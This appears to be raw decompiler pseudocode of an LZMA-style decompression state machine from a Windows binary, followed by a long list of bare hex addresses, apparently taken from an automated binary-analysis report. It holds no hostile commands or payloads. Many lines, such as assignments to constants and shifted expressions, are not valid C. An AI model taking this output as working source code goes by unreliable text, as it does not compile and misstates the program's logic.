													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ec2
0x00406ec9
0x00406ecf
0x00406ed5
0x00406ee7
0x00406eed
0x00406ef2
0x00000000
0x00406ea3
0x00406ea9
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
